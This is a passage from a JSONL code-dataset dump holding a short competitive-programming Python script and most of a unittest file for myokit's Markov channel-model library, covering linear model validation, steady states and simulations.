\"\")\n\nmain()\n","repo_name":"Nepumi-Jr/Garedami","sub_path":"StandardJudge/StdJudge.py","file_name":"StdJudge.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37004559655","text":"for _ in range(int(input())):\n n,k=map(int,input().split())\n l=sorted(list(map(int,input().split())))\n #print(l)\n sum_a=[]\n sum_b=[]\n for i in l:\n if(i>k):\n sum_b.append(i)\n else:\n sum_a.append(i)\n #result=sum(sum_a)\n for i in range(len(sum_b)-1):\n #print(sum_a)\n #print(i)\n if sum_b[i]>k:\n c=sum_b[i]-k\n sum_a.append(k)\n sum_b[i+1]-=c\n elif sum_b[i]==k:\n sum_a.append(sum_b[i])\n sum_a.append(sum_b[-1])\n #print(sum_a)\n print(sum(sum_a))\n","repo_name":"selvamanikannan/code-for-good","sub_path":"code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"303238145","text":"import os\nimport unittest\n\nimport numpy as np\n\nimport myokit\nimport myokit.lib.markov as markov\n\nfrom myokit.tests import DIR_DATA, WarningCollector\n\n\nclass LinearModelTest(unittest.TestCase):\n \"\"\"\n Tests the linear model class.\n \"\"\"\n\n def test_manual_creation(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Select a number of states and parameters\n states = [\n 'ina.C3',\n 'ina.C2',\n 'ina.C1',\n 'ina.IF',\n 'ina.IS',\n model.get('ina.O'),\n ]\n parameters = [\n 'ina.p1',\n 'ina.p2',\n 'ina.p3',\n model.get('ina.p4'),\n ]\n current = 'ina.i'\n\n # Create a markov model\n m = markov.LinearModel(model, states, parameters, current)\n markov.LinearModel(model, states, parameters, model.get(current))\n\n # Check membrane potential\n self.assertEqual(m.membrane_potential(), 'membrane.V')\n\n # Check parameters\n parameters[3] = parameters[3].qname()\n for p in m.parameters():\n self.assertIn(p, parameters)\n\n # Test deprecated MarkovModel class\n with WarningCollector() as w:\n m2 = markov.MarkovModel(model, states, parameters, current)\n self.assertEqual(type(m2), markov.AnalyticalSimulation)\n self.assertIn('deprecated', w.text())\n\n # State doesn't exist\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unknown state',\n markov.LinearModel, model, states + ['bert'], parameters, current)\n\n # State isn't a state\n 
self.assertRaisesRegex(\n markov.LinearModelError, 'not a state',\n markov.LinearModel, model, states + ['ina.i'], parameters, current)\n\n # State added twice\n self.assertRaisesRegex(\n markov.LinearModelError, 'twice',\n markov.LinearModel, model, states + ['ina.O'], parameters, current)\n\n # No parameters is allowed\n markov.LinearModel(model, states, None, current)\n\n # Non-literal parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unsuitable',\n markov.LinearModel, model, states, parameters + ['ina.i'], current)\n\n # Parameter added twice\n self.assertRaisesRegex(\n markov.LinearModelError, 'Parameter listed twice',\n markov.LinearModel,\n model, states, parameters + ['ina.p1'], current)\n\n # Unknown parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unknown parameter', markov.LinearModel,\n model, states, parameters + ['ina.p1000'], current)\n\n # Current is a state\n self.assertRaisesRegex(\n markov.LinearModelError, 'Current variable can not be a state',\n markov.LinearModel, model, states, parameters, 'ina.O')\n\n # Current is not a function of the states\n m2 = model.clone()\n markov.LinearModel(m2, states, parameters, current)\n m2.get(current).set_rhs(0)\n self.assertRaisesRegex(\n markov.LinearModelError, 'Current must be a function of',\n markov.LinearModel, m2, states, parameters, current)\n\n # Vm not given in model\n m2 = model.clone()\n markov.LinearModel(m2, states, parameters, current)\n m2.get('membrane.V').set_label(None)\n self.assertRaisesRegex(\n markov.LinearModelError, 'potential must be specified',\n markov.LinearModel, m2, states, parameters, current)\n markov.LinearModel(m2, states, parameters, current, vm='membrane.V')\n\n # Vm is a parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'list of parameters', markov.LinearModel,\n m2, states, parameters, current, vm=parameters[0])\n\n # Vm is a state\n self.assertRaisesRegex(\n markov.LinearModelError, 'list of states',\n markov.LinearModel, m2, states, parameters, current, vm=states[0])\n\n # Vm is the current\n self.assertRaisesRegex(\n markov.LinearModelError, 'be the current',\n markov.LinearModel, m2, states, parameters, current, vm=current)\n\n # States must have bidrectional dependencies\n m2 = model.clone()\n # Set bad config, but with columns still summing to zero\n m2.get('ina.C3').set_rhs('ina.C1')\n x = m2.get('ina.C2')\n x.set_rhs(str(x.rhs()) + '+ a12 * C2 + - b12 * C1')\n x = m2.get('ina.C1')\n x.set_rhs(str(x.rhs()) + ' - ina.C1')\n self.assertRaisesRegex(\n markov.LinearModelError, 'not vice versa',\n markov.LinearModel, m2, states, parameters, current)\n\n # States must sum to 1\n m2 = model.clone()\n m2.get(states[0]).set_initial_value(0.6)\n m2.get(states[1]).set_initial_value(0.6)\n self.assertRaisesRegex(\n markov.LinearModelError, 'sum of states',\n markov.LinearModel, m2, states, parameters, current)\n\n # Derivatives per column don't sum to zero\n m2 = model.clone()\n x = m2.get(states[0])\n x.set_rhs('2 * ' + str(x.rhs()))\n self.assertRaisesRegex(\n markov.LinearModelError, 'sum to non-zero',\n markov.LinearModel, m2, states, parameters, current)\n\n # Not a linear model\n m2 = model.clone()\n x = m2.get(states[0])\n y = m2.get(states[1])\n # Set rhs to something non-linear, make sure columns still sum to 0\n x.set_rhs(str(x.rhs()) + ' + C1^2')\n y.set_rhs(str(y.rhs()) + ' - C1^2')\n self.assertRaisesRegex(\n markov.LinearModelError, 'linear combination of states',\n markov.LinearModel, m2, states, parameters, current)\n\n # Current not a linear 
combination of states\n m2 = model.clone()\n m2.get(current).set_rhs('sqrt(ina.O)')\n self.assertRaisesRegex(\n markov.LinearModelError, 'linear combination of states',\n markov.LinearModel, m2, states, parameters, current)\n\n def test_linear_model_from_component(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a markov model\n markov.LinearModel.from_component(model.get('ina'))\n\n # Test deprecated MarkovModel class\n with WarningCollector() as w:\n m = markov.MarkovModel.from_component(model.get('ina'))\n self.assertEqual(type(m), markov.AnalyticalSimulation)\n self.assertIn('deprecated', w.text())\n\n # Test partially automatic creation\n states = [\n 'ina.C3',\n 'ina.C2',\n 'ina.C1',\n 'ina.IF',\n 'ina.IS',\n model.get('ina.O'),\n ]\n markov.LinearModel.from_component(model.get('ina'), states=states)\n\n parameters = [\n 'ina.p1',\n 'ina.p2',\n 'ina.p3',\n model.get('ina.p4',)\n ]\n markov.LinearModel.from_component(\n model.get('ina'), parameters=parameters)\n\n current = 'ina.i'\n markov.LinearModel.from_component(model.get('ina'), current=current)\n\n markov.LinearModel.from_component(\n model.get('ina'), current=model.get(current))\n\n # No current --> This is allowed\n m2 = model.clone()\n m2.get('ina').remove_variable(m2.get('ina.i'))\n m = markov.LinearModel.from_component(m2.get('ina'))\n\n # Two currents\n m2 = model.clone()\n v = m2.get('ina').add_variable('i2')\n v.set_rhs(m2.get('ina.i').rhs().clone())\n self.assertRaisesRegex(\n markov.LinearModelError,\n 'more than one variable that could be a current',\n markov.LinearModel.from_component, m2.get('ina'))\n\n # Explict vm\n m2 = model.clone()\n m2.get('membrane.V').set_label(None)\n markov.LinearModel.from_component(model.get('ina'), vm='membrane.V')\n self.assertRaisesRegex(\n markov.LinearModelError,\n 'labeled as \"membrane_potential\"',\n markov.LinearModel.from_component, m2.get('ina'))\n\n def test_linear_model_matrices(self):\n\n # Create model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Test shape of output\n A, B = m.matrices(-20, range(21))\n self.assertEqual(A.shape, (6, 6))\n self.assertEqual(B.shape, (6, ))\n\n # Requires 21 parameters\n self.assertRaises(ValueError, m.matrices, -20, range(3))\n\n def test_linear_model_steady_state_1(self):\n # Test finding the steady-state of the Clancy model\n\n # Create model\n filename = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(filename)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Get steady state\n ss = np.array(m.steady_state())\n\n # Check that this is a valid steady state\n self.assertTrue(np.all(ss >= 0))\n self.assertTrue(np.all(ss <= 1))\n\n # Check that derivatives with ss are close to zero\n ss = list(ss)\n model.set_initial_values(ss + ss) # Model has 2 ina's\n derivs = model.evaluate_derivatives()\n for i in range(len(ss)):\n self.assertAlmostEqual(0, derivs[i])\n\n # Try with awful parameters\n self.assertRaisesRegex(\n markov.LinearModelError, 'positive eigenvalues',\n m.steady_state, parameters=[-1] * 21)\n\n def test_linear_model_steady_state_2(self):\n # Test finding the steady-state of one of Dominic's models, which\n # exposed a bug in the steady state code\n\n # Create model\n filename = os.path.join(DIR_DATA, 'dom-markov.mmt')\n model = myokit.load_model(filename)\n m = 
markov.LinearModel.from_component(model.get('ikr'))\n\n # Get steady state\n ss = np.array(m.steady_state())\n\n # Check that this is a valid steady state\n self.assertTrue(np.all(ss >= 0))\n self.assertTrue(np.all(ss <= 1))\n\n # Check that derivatives with ss are close to zero\n model.set_initial_values(ss)\n derivs = model.evaluate_derivatives()\n for i in range(len(ss)):\n self.assertAlmostEqual(0, derivs[i])\n\n def test_rates(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a markov model\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Test rates method runs\n self.assertEqual(len(m.rates()), 12)\n m.rates(parameters=[0.01] * 21)\n self.assertRaisesRegex(\n ValueError, 'Illegal parameter vector size',\n m.rates, parameters=[0.01] * 22)\n\n def test_initial_value_conversion(self):\n # Tests that initial value expressions are converted to floats\n\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n model.get('ina.C3').set_initial_value('1 / sqrt(7)')\n model.get('ina.C2').set_initial_value('-1 / log(ina_ref.p)')\n model.get('ina.C1').set_initial_value(0.5134619065149598)\n m = markov.LinearModel.from_component(model.get('ina'))\n x0 = m.default_state()\n self.assertEqual(len(x0), 6)\n self.assertIsInstance(x0[0], float)\n self.assertIsInstance(x0[1], float)\n self.assertAlmostEqual(x0[0], 0.3779644730092272)\n self.assertAlmostEqual(x0[1], 0.10857362047581297)\n\n\nclass AnalyticalSimulationTest(unittest.TestCase):\n \"\"\"\n Tests :class:`myokit.lib.markov.AnalyticalSimulation`.\n \"\"\"\n\n def test_create_and_run(self):\n # Test basics of analytical simulation\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Bad constructors\n self.assertRaisesRegex(\n ValueError, 'LinearModel', markov.AnalyticalSimulation, 1)\n self.assertRaisesRegex(\n ValueError, 'Protocol', markov.AnalyticalSimulation, m, 1)\n\n # Create properly\n s = markov.AnalyticalSimulation(m)\n\n # Times to evaluate at\n times = np.linspace(0, 100, 5)\n\n # Voltages to test at\n voltages = np.arange(-70, 0, 30)\n\n # Generate traces with \"solve\" method\n state = s.state()\n dstate = s.default_state()\n for v in voltages:\n s.set_membrane_potential(v)\n x, i = s.solve(times)\n\n # Solve shouldn't change the state\n self.assertEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n\n # Run for a bit\n self.assertIsInstance(s.run(10), myokit.DataLog)\n\n # Calculate current for a particular state\n self.assertIsInstance(s.current(s.state()), float)\n\n # No current variable? 
Then current can't be calculated\n model2 = model.clone()\n model2.get('ina').remove_variable(model2.get('ina.i'))\n m2 = markov.LinearModel.from_component(model2.get('ina'))\n s2 = markov.AnalyticalSimulation(m2)\n self.assertRaisesRegex(\n Exception, 'did not specify a current', s2.current, s2.state())\n # But simulation still works\n self.assertIsInstance(s2.run(10), myokit.DataLog)\n del model2, m2, s2\n\n # Create protocol\n\n # Protocol times: prep, step, post, full\n tprep = 2800\n tstep = 15\n tpost = 0\n\n # Step voltages\n vhold = -80\n vlo = -140\n vhi = 100\n res = 50\n v = np.arange(vlo, vhi + res, res)\n p = myokit.pacing.steptrain(v, vhold, tprep, tstep, tpost)\n t = p.characteristic_time()\n\n # Create simulation with protocol (set_protocol is not supported)\n s = markov.AnalyticalSimulation(m, p)\n\n # Membrane potential and protocol can't be used simultaneously\n self.assertRaisesRegex(\n Exception, 'cannot be set if', s.set_membrane_potential, -80)\n\n # Pre should change the state and default state\n state = s.state()\n dstate = s.default_state()\n s.pre(tprep + tstep)\n self.assertNotEqual(state, s.state())\n self.assertNotEqual(dstate, s.default_state())\n self.assertRaises(ValueError, s.pre, -1)\n\n # Run should change the state, not the default state\n state = s.state()\n dstate = s.default_state()\n d = s.run(t)\n self.assertNotEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'Duration', s.run, -1)\n self.assertRaisesRegex(\n ValueError, 'Log interval', s.run, 1, log_interval=-1)\n d['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra keys', s.run, 1, log=d)\n del d['hello']\n del d[next(iter(d.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d)\n\n # Reset should reset the state\n s.reset()\n self.assertEqual(state, s.state())\n\n # Run can append to log\n d = s.run(10)\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n\n def test_analytical_simulation_properties(self):\n # Test basic get/set methods of analytical simulation.\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n s = markov.AnalyticalSimulation(m)\n\n # membrane potential\n self.assertEqual(\n s.membrane_potential(), model.get('membrane.V').eval())\n s.set_membrane_potential(10)\n self.assertEqual(s.membrane_potential(), 10)\n\n # Parameter values\n p = list(range(len(s.parameters())))\n self.assertNotEqual(p, s.parameters())\n s.set_parameters(p)\n self.assertEqual(p, s.parameters())\n self.assertRaises(ValueError, s.set_parameters, p[:-1])\n\n # Change parameter with set_constant\n p[3] += 1\n self.assertNotEqual(p, s.parameters())\n s.set_constant(m.parameters()[3], p[3])\n self.assertEqual(p, s.parameters())\n\n # State\n state = np.zeros(len(s.state()))\n state[0] = 0.5\n state[1] = 0.5\n self.assertNotEqual(list(state), list(s.state()))\n s.set_state(state)\n self.assertEqual(list(state), list(s.state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_state, state[:-1])\n state[0] += 0.1\n self.assertRaisesRegex(\n ValueError, 'sum to 1', s.set_state, state)\n state[0] = -.1\n state[1] = 1.1\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_state, state)\n\n # Default state\n dstate = np.zeros(len(s.default_state()))\n dstate[0] = 0.5\n dstate[1] = 0.5\n self.assertNotEqual(list(dstate), 
list(s.default_state()))\n s.set_default_state(dstate)\n self.assertEqual(list(dstate), list(s.default_state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_default_state, dstate[:-1])\n dstate[0] += 0.1\n self.assertRaisesRegex(\n ValueError, 'sum to 1', s.set_default_state, dstate)\n dstate[0] = -.1\n dstate[1] = 1.1\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_default_state, dstate)\n\n def test_against_cvode(self):\n # Validate against a cvode sim.\n\n # Get a model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a protocol\n vs = [-30, -20, -10]\n p = myokit.pacing.steptrain(\n vsteps=vs,\n vhold=-120,\n tpre=8,\n tstep=2,\n tpost=0)\n t = p.characteristic_time()\n\n # Run an analytical simulation\n dt = 0.01\n m = markov.LinearModel.from_component(model.get('ina'))\n s1 = markov.AnalyticalSimulation(m, p)\n d1 = s1.run(t, log_interval=dt).npview()\n\n s2 = myokit.Simulation(model, p)\n s2.set_tolerance(1e-8, 1e-8)\n d2 = s2.run(t, log_interval=dt).npview()\n\n # Test protocol output is the same\n e = np.abs(d1['membrane.V'] - d2['membrane.V'])\n if False:\n import matplotlib.pyplot as plt\n plt.figure()\n plt.plot(d1['membrane.V'])\n plt.plot(d2['membrane.V'])\n plt.show()\n self.assertEqual(np.max(e), 0)\n\n # Test current output is very similar\n e = np.abs(d1['ina.i'] - d2['ina.i'])\n if False:\n import matplotlib.pyplot as plt\n plt.figure()\n plt.plot(d1['ina.i'])\n plt.plot(d2['ina.i'])\n plt.figure()\n plt.plot(d1['ina.i'] - d2['ina.i'])\n plt.show()\n self.assertLess(np.max(e), 2e-4)\n\n\nclass DiscreteSimulationTest(unittest.TestCase):\n \"\"\"\n Tests :class:`myokit.lib.markov.DiscreteSimulationTest`.\n \"\"\"\n\n def test_basics(self):\n # Test the DiscreteSimulation class, running, resetting etc..\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Bad constructors\n self.assertRaisesRegex(\n ValueError, 'LinearModel', markov.DiscreteSimulation, 1)\n self.assertRaisesRegex(\n ValueError, 'Protocol', markov.DiscreteSimulation, m, 1)\n self.assertRaisesRegex(\n ValueError, 'at least 1',\n markov.DiscreteSimulation, m, nchannels=0)\n\n # Test running without a protocol\n s = markov.DiscreteSimulation(m)\n s.run(1)\n\n # Rest running for a very short time doesn't cause crash\n s.run(0)\n\n # Create protocol\n\n # Protocol times: prep, step, post, full\n tprep = 10\n tstep = 150\n tpost = 0\n\n # Step voltages\n vhold = -80\n vlo = -140\n vhi = 100\n res = 50\n v = np.arange(vlo, vhi + res, res)\n p = myokit.pacing.steptrain(v, vhold, tprep, tstep, tpost)\n\n # Create simulation with protocol (set_protocol is not supported)\n np.random.seed(1)\n s = markov.DiscreteSimulation(m, p)\n\n # Membrane potential and protocol can't be used simultaneously\n self.assertRaisesRegex(\n Exception, 'cannot be set if', s.set_membrane_potential, -80)\n\n # Pre should change the state and default state\n state = s.state()\n dstate = s.default_state()\n s.pre(tprep + tstep)\n self.assertNotEqual(state, s.state())\n self.assertNotEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'negative', s.pre, -1)\n\n # Run should change the state, not the default state\n state = s.state()\n dstate = s.default_state()\n d = s.run(15)\n self.assertNotEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'negative', 
s.run, -1)\n\n # Reset should reset the state\n s.reset()\n self.assertEqual(state, s.state())\n\n # Run can append to log\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n self.assertEqual(len(d['engine.time']), len(d['membrane.V']))\n self.assertEqual(len(d['engine.time']), len(d['ina.i']))\n self.assertEqual(len(d['engine.time']), len(d['ina.O']))\n d2 = d.clone()\n del d2[next(iter(d2.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d2)\n d2 = d.clone()\n d2['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra', s.run, 1, log=d2)\n\n #\n # Test without current variable\n #\n model.get('ina').remove_variable(model.get('ina.i'))\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Create simulation with protocol (set_protocol is not supported)\n np.random.seed(1)\n s = markov.DiscreteSimulation(m, p)\n d = s.run(10)\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n self.assertEqual(len(d['engine.time']), len(d['membrane.V']))\n self.assertEqual(len(d['engine.time']), len(d['ina.O']))\n self.assertNotIn('ina.i', d)\n d2 = d.clone()\n del d2[next(iter(d2.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d2)\n d2 = d.clone()\n d2['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra', s.run, 1, log=d2)\n\n def test_discrete_simulation_properties(self):\n # Test basic get/set methods of discrete simulation.\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n s = markov.DiscreteSimulation(m, nchannels=50)\n\n # membrane potential\n self.assertEqual(\n s.membrane_potential(), model.get('membrane.V').eval())\n s.set_membrane_potential(10)\n self.assertEqual(s.membrane_potential(), 10)\n\n # Number of channels\n self.assertEqual(s.number_of_channels(), 50)\n\n # Parameter values\n p = list(range(len(s.parameters())))\n self.assertNotEqual(p, s.parameters())\n s.set_parameters(p)\n self.assertEqual(p, s.parameters())\n self.assertRaises(ValueError, s.set_parameters, p[:-1])\n\n # Change parameter with set_constant\n p[3] += 1\n self.assertNotEqual(p, s.parameters())\n s.set_constant(m.parameters()[3], p[3])\n self.assertEqual(p, s.parameters())\n\n # State\n state = np.zeros(len(s.state()))\n state[0] = 25\n state[1] = 25\n self.assertNotEqual(list(state), list(s.state()))\n s.set_state(state)\n self.assertEqual(list(state), list(s.state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_state, state[:-1])\n state[0] += 1\n self.assertRaisesRegex(\n ValueError, 'must equal', s.set_state, state)\n state[0] = -1\n state[1] = 51\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_state, state)\n\n # Default state\n dstate = np.zeros(len(s.default_state()))\n dstate[0] = 25\n dstate[1] = 25\n self.assertNotEqual(list(dstate), list(s.default_state()))\n s.set_default_state(dstate)\n self.assertEqual(list(dstate), list(s.default_state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_default_state, dstate[:-1])\n dstate[0] += 1\n self.assertRaisesRegex(\n ValueError, 'must equal', s.set_default_state, dstate)\n dstate[0] = -1\n dstate[1] = 51\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_default_state, dstate)\n\n # Discretize state\n self.assertEqual(s.discretize_state([0.4, 0.6]), [20, 30])\n 
self.assertRaisesRegex(\n ValueError, 'must equal 1', s.discretize_state, [0.5, 0.6])\n\n\nclass MarkovFunctionsTest(unittest.TestCase):\n \"\"\"\n Test cases for finding Markov models.\n \"\"\"\n\n def test_convert_markov_models_to_compact_form(self):\n # Tests convert_markov_models_to_compact_form()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model1 = myokit.load_model(fname)\n\n models = markov.find_markov_models(model1)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n\n # Check both models are full ODE form\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1))\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2))\n\n # Convert both compact form\n model2 = markov.convert_markov_models_to_compact_form(model1)\n models = markov.find_markov_models(model2)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1) - 1)\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2) - 1)\n\n # Check states evaluate to the same value\n self.assertEqual(\n model1.get('ina.C1').eval(), model2.get('ina.C1').eval())\n self.assertEqual(\n model1.get('ina.C2').eval(), model2.get('ina.C2').eval())\n self.assertEqual(\n model1.get('ina.C3').eval(), model2.get('ina.C3').eval())\n self.assertEqual(\n model1.get('ina.IF').eval(), model2.get('ina.IF').eval())\n self.assertEqual(\n model1.get('ina.IS').eval(), model2.get('ina.IS').eval())\n self.assertEqual(\n model1.get('ina.O').eval(), model2.get('ina.O').eval())\n\n # Doing it twice should have no effect\n model3 = markov.convert_markov_models_to_compact_form(model2)\n self.assertEqual(model2.code(), model3.code())\n\n def test_convert_markov_models_to_full_ode_form(self):\n # Tests convert_markov_models_to_compact_form()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model1 = myokit.load_model(fname)\n\n # Convert to compact form, and check that it worked\n model1 = markov.convert_markov_models_to_compact_form(model1)\n m1, m2 = markov.find_markov_models(model1)\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1) - 1)\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2) - 1)\n\n # Now convert to full form\n model2 = markov.convert_markov_models_to_full_ode_form(model1)\n m1, m2 = markov.find_markov_models(model2)\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1))\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2))\n\n # Check states evaluate to the same value\n self.assertEqual(\n model1.get('ina.C1').eval(), model2.get('ina.C1').eval())\n self.assertEqual(\n model1.get('ina.C2').eval(), model2.get('ina.C2').eval())\n self.assertEqual(\n model1.get('ina.C3').eval(), model2.get('ina.C3').eval())\n self.assertEqual(\n model1.get('ina.IF').eval(), model2.get('ina.IF').eval())\n self.assertEqual(\n model1.get('ina.IS').eval(), model2.get('ina.IS').eval())\n self.assertEqual(\n model1.get('ina.O').eval(), model2.get('ina.O').eval())\n\n # Doing it twice should have no effect\n model3 = markov.convert_markov_models_to_full_ode_form(model2)\n self.assertEqual(model2.code(), model3.code())\n\n def test_find_markov_models(self):\n # Tests find_markov_models()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 
models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n\n # Check states and ordering\n m1, m2 = models\n self.assertEqual([v.qname() for v in m1], [\n 'ina.C1', 'ina.C2', 'ina.C3', 'ina.IF', 'ina.IS', 'ina.O'])\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n del models, m1, m2\n\n # Try with `1 - sum(xi)` state\n c = model.get('ina_ref')\n v = c.get('C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n del models, m1, m2\n\n # Try with `1 - sum(xi)` state, with a funny RHS\n c = model.get('ina_ref')\n v = c.get('C3')\n v.set_rhs('-(+IF + C1 -(-IS - C2)) + 1 - O')\n models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n\n def test_find_markov_models_bad(self):\n # Tests find_markov_models() for non-markov models\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Remove ina_ref component\n c = model.get('ina_ref')\n for v in c.variables(deep=True):\n v.set_rhs(0)\n for v in list(c.variables(deep=True)):\n c.remove_variable(v, recursive=True)\n\n # Only one markov model left at this point\n self.assertEqual(len(markov.find_markov_models(model)), 1)\n\n # Check searching states that no-one refers to\n # (And for cases where not each state is a linear combo)\n m = model.clone()\n for v in list(m.get('ina.C1').refs_by(True)):\n v.set_rhs(3)\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test with one 1-minus state\n m = model.clone()\n v = m.get('ina.C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n\n # Test without a 1\n v.set_rhs('2 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n v.set_rhs('-C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test 1-... contains non-linear terms\n v.set_rhs('1 - C1 - C2 - IF - IS - O - O^2')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test 1-... contains terms with a factor other than -1\n v.set_rhs('1 - C1 - C2 - IF - IS - O - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test if there's multiple variables with a 1-... RHS\n m = model.clone()\n v = m.get('ina.C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n v = m.get('ina').add_variable('C4')\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # But having an extra variable is fine, if the rest checks out!\n m = model.clone()\n v = m.get('ina').add_variable('C4')\n v.set_rhs('1 - C1 - C2 - C3 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n\n # Must have at least two states\n m = myokit.Model()\n c = m.add_component('c')\n t = c.add_variable('time')\n t.set_binding('time')\n v = c.add_variable('v')\n v.promote(0.1)\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n def test_linear_combination(self):\n # Tests _linear_combination()\n\n # Load model, to create interesting RHS\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n v5 = model.get('ina.IS')\n v6 = model.get('ina.O')\n\n # Test C1 rhs\n f = markov._linear_combination(v1.rhs(), [v1, v2, v3, v4, v5, v6])\n self.assertEqual(f[0].code(), '-(ina.a13 + ina.b12 + ina.b3)')\n self.assertEqual(f[1].code(), 